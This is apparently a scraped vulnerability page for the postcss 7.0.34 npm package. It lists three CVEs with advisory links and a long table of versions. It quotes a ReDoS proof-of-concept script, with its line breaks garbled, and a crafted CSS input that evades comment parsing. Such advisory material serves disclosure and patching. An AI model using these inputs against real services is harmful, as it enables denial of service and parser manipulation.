NodeJS/postcss/7.0.34
Tool for transforming styles with JS plugins
https://www.npmjs.com/package/postcss
MIT
3 Security Vulnerabilities
Regular Expression Denial of Service in postcss
- https://nvd.nist.gov/vuln/detail/CVE-2021-23382
- https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641
- https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640
- https://github.com/advisories/GHSA-566m-qj78-rww5
- https://github.com/postcss/postcss/releases/tag/7.0.36
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
regex
\/\*\s* sourceMappingURL=(.*)
PoC
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
- https://nvd.nist.gov/vuln/detail/CVE-2023-44270
- https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5
- https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25
- https://github.com/postcss/postcss/releases/tag/8.4.31
- https://github.com/advisories/GHSA-7fh5-64p2-3v2j
- https://github.com/github/advisory-database/issues/2820
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r
discrepancies, as demonstrated by @font-face{ font:(\r/*);}
in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
Regular Expression Denial of Service in postcss
- https://nvd.nist.gov/vuln/detail/CVE-2021-23368
- https://github.com/advisories/GHSA-hwj9-h5mp-3pm3
- https://github.com/postcss/postcss/commit/8682b1e4e328432ba692bed52326e84439cec9e4
- https://github.com/postcss/postcss/commit/b6f3e4d5a8d7504d553267f80384373af3a3dec5
- https://lists.apache.org/thread.html/r00158f5d770d75d0655c5eef1bdbc6150531606c8f8bcb778f0627be@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r16e295b4f02d81b79981237d602cb0b9e59709bafaa73ac98be7cef1@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r49afb49b38748897211b1f89c3a64dc27f9049474322b05715695aab@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r5acd89f3827ad9a9cad6d24ed93e377f7114867cd98cfba616c6e013@%3Ccommits.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r8def971a66cf3e375178fbee752e1b04a812a047cc478ad292007e33@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/rad5af2044afb51668b1008b389ac815a28ecea9eb75ae2cab5a00ebb@%3Ccommits.myfaces.apache.org%3E
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1244795
- https://snyk.io/vuln/SNYK-JS-POSTCSS-1090595
- https://github.com/postcss/postcss/commit/54cbf3c4847eb0fb1501b9d2337465439e849734
The npm package postcss
from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
261 Other Versions
Version | License | Security | Released | |
---|---|---|---|---|
8.4.47 | MIT | 2024-09-14 - 14:37 | 6 days | |
8.4.46 | MIT | 2024-09-14 - 14:28 | 6 days | |
8.4.45 | MIT | 2024-09-04 - 09:35 | 17 days | |
8.4.44 | MIT | 2024-09-02 - 08:23 | 19 days | |
8.4.43 | MIT | 2024-09-01 - 19:07 | 19 days | |
8.4.42 | MIT | 2024-08-31 - 21:29 | 20 days | |
8.4.41 | MIT | 2024-08-05 - 23:08 | about 2 months | |
8.4.40 | MIT | 2024-07-24 - 19:37 | about 2 months | |
8.4.39 | MIT | 2024-06-29 - 18:22 | 3 months | |
8.4.38 | MIT | 2024-03-20 - 22:55 | 6 months | |
8.4.37 | MIT | 2024-03-19 - 16:57 | 6 months | |
8.4.36 | MIT | 2024-03-17 - 20:09 | 6 months | |
8.4.35 | MIT | 2024-02-07 - 15:37 | 8 months | |
8.4.34 | MIT | 2024-02-05 - 19:22 | 8 months | |
8.4.33 | MIT | 2024-01-04 - 19:04 | 9 months | |
8.4.32 | MIT | 2023-12-02 - 02:56 | 10 months | |
8.4.31 | MIT | 2023-09-28 - 22:15 | 12 months | |
8.4.30 | MIT | 1 | 2023-09-18 - 21:24 | about 1 year |
8.4.29 | MIT | 1 | 2023-08-29 - 17:47 | about 1 year |
8.4.28 | MIT | 1 | 2023-08-15 - 19:12 | about 1 year |
8.4.27 | MIT | 1 | 2023-07-21 - 11:51 | about 1 year |
8.4.26 | MIT | 1 | 2023-07-13 - 19:24 | about 1 year |
8.4.25 | MIT | 1 | 2023-07-06 - 11:44 | about 1 year |
8.4.24 | MIT | 1 | 2023-05-28 - 09:32 | over 1 year |
8.4.23 | MIT | 1 | 2023-04-19 - 19:03 | over 1 year |
8.4.22 | MIT | 1 | 2023-04-16 - 13:02 | over 1 year |
8.4.21 | MIT | 1 | 2023-01-06 - 20:29 | over 1 year |
8.4.20 | MIT | 1 | 2022-12-11 - 17:35 | almost 2 years |
8.4.19 | MIT | 1 | 2022-11-10 - 22:57 | almost 2 years |
8.4.18 | MIT | 1 | 2022-10-12 - 19:28 | almost 2 years |
8.4.17 | MIT | 1 | 2022-09-30 - 11:29 | almost 2 years |
8.4.16 | MIT | 1 | 2022-08-06 - 18:59 | about 2 years |
8.4.15 | MIT | 1 | 2022-08-06 - 18:25 | about 2 years |
8.4.14 | MIT | 1 | 2022-05-18 - 16:14 | over 2 years |
8.4.13 | MIT | 1 | 2022-04-30 - 00:50 | over 2 years |
8.4.12 | MIT | 1 | 2022-03-16 - 08:38 | over 2 years |
8.4.11 | MIT | 1 | 2022-03-15 - 18:28 | over 2 years |
8.4.10 | MIT | 1 | 2022-03-15 - 18:18 | over 2 years |
8.4.9 | MIT | 1 | 2022-03-15 - 18:08 | over 2 years |
8.4.8 | MIT | 1 | 2022-03-07 - 02:10 | over 2 years |
8.4.7 | MIT | 1 | 2022-02-24 - 22:07 | over 2 years |
8.4.6 | MIT | 1 | 2022-02-01 - 11:37 | over 2 years |
8.4.5 | MIT | 1 | 2021-12-13 - 00:03 | almost 3 years |
8.4.4 | MIT | 1 | 2021-11-27 - 14:58 | almost 3 years |
8.4.3 | MIT | 1 | 2021-11-26 - 19:20 | almost 3 years |
8.4.2 | MIT | 1 | 2021-11-26 - 18:45 | almost 3 years |
8.4.1 | MIT | 1 | 2021-11-24 - 22:06 | almost 3 years |
8.4.0 | MIT | 1 | 2021-11-24 - 13:06 | almost 3 years |
8.3.11 | MIT | 1 | 2021-10-21 - 12:43 | almost 3 years |
8.3.10 | MIT | 1 | 2021-10-20 - 17:47 | almost 3 years |
8.3.9 | MIT | 1 | 2021-10-04 - 20:14 | almost 3 years |
8.3.8 | MIT | 1 | 2021-09-25 - 07:33 | almost 3 years |
8.3.7 | MIT | 1 | 2021-09-22 - 05:54 | almost 3 years |
8.3.6 | MIT | 1 | 2021-07-21 - 15:53 | about 3 years |
8.3.5 | MIT | 1 | 2021-06-17 - 03:25 | over 3 years |
8.3.4 | MIT | 1 | 2021-06-14 - 13:27 | over 3 years |
8.3.3 | MIT | 1 | 2021-06-14 - 05:34 | over 3 years |
8.3.2 | MIT | 1 | 2021-06-11 - 02:57 | over 3 years |
8.3.1 | MIT | 1 | 2021-06-09 - 23:38 | over 3 years |
8.3.0 | MIT | 1 | 2021-05-21 - 03:41 | over 3 years |
8.2.15 | MIT | 1 | 2021-05-10 - 19:56 | over 3 years |
8.2.14 | MIT | 1 | 2021-05-05 - 19:44 | over 3 years |
8.2.13 | MIT | 1 | 2021-04-26 - 12:26 | over 3 years |
8.2.12 | MIT | 2 | 2021-04-22 - 15:50 | over 3 years |
8.2.11 | MIT | 2 | 2021-04-22 - 15:32 | over 3 years |
8.2.10 | MIT | 2 | 2021-04-11 - 16:37 | over 3 years |
8.2.9 | MIT | 3 | 2021-03-30 - 20:43 | over 3 years |
8.2.8 | MIT | 3 | 2021-03-09 - 22:04 | over 3 years |
8.2.7 | MIT | 3 | 2021-03-03 - 23:25 | over 3 years |
8.2.6 | MIT | 3 | 2021-02-10 - 18:38 | over 3 years |
8.2.5 | MIT | 3 | 2021-02-06 - 18:57 | over 3 years |
8.2.4 | MIT | 3 | 2021-01-09 - 10:28 | over 3 years |
8.2.3 | MIT | 3 | 2021-01-07 - 12:06 | over 3 years |
8.2.2 | MIT | 3 | 2020-12-29 - 20:56 | over 3 years |
8.2.1 | MIT | 3 | 2020-12-09 - 11:52 | almost 4 years |
8.2.0 | MIT | 3 | 2020-12-08 - 07:16 | almost 4 years |
8.1.14 | MIT | 3 | 2020-12-04 - 00:21 | almost 4 years |
8.1.13 | MIT | 3 | 2020-12-03 - 03:14 | almost 4 years |
8.1.12 | MIT | 3 | 2020-12-03 - 02:41 | almost 4 years |
8.1.11 | MIT | 3 | 2020-12-03 - 01:44 | almost 4 years |
8.1.10 | MIT | 3 | 2020-11-23 - 22:17 | almost 4 years |
8.1.9 | MIT | 3 | 2020-11-21 - 18:37 | almost 4 years |
8.1.8 | MIT | 3 | 2020-11-19 - 15:58 | almost 4 years |
8.1.7 | MIT | 3 | 2020-11-10 - 15:58 | almost 4 years |
8.1.6 | MIT | 3 | 2020-11-05 - 16:28 | almost 4 years |
8.1.5 | MIT | 3 | 2020-11-05 - 15:50 | almost 4 years |
8.1.4 | MIT | 3 | 2020-10-24 - 00:03 | almost 4 years |
8.1.3 | MIT | 3 | 2020-10-23 - 02:20 | almost 4 years |
8.1.2 | MIT | 3 | 2020-10-19 - 00:02 | almost 4 years |
8.1.1 | MIT | 3 | 2020-09-28 - 21:47 | almost 4 years |
8.1.0 | MIT | 3 | 2020-09-26 - 23:35 | almost 4 years |
8.0.9 | MIT | 3 | 2020-09-23 - 17:04 | almost 4 years |
8.0.8 | MIT | 3 | 2020-09-23 - 02:11 | almost 4 years |
8.0.7 | MIT | 3 | 2020-09-22 - 00:55 | almost 4 years |
8.0.6 | MIT | 3 | 2020-09-20 - 16:53 | about 4 years |
8.0.5 | MIT | 3 | 2020-09-17 - 02:42 | about 4 years |
8.0.4 | MIT | 3 | 2020-09-16 - 22:20 | about 4 years |
8.0.3 | MIT | 3 | 2020-09-15 - 19:13 | about 4 years |
8.0.2 | MIT | 3 | 2020-09-15 - 16:46 | about 4 years |
8.0.1 | MIT | 3 | 2020-09-15 - 15:34 | about 4 years |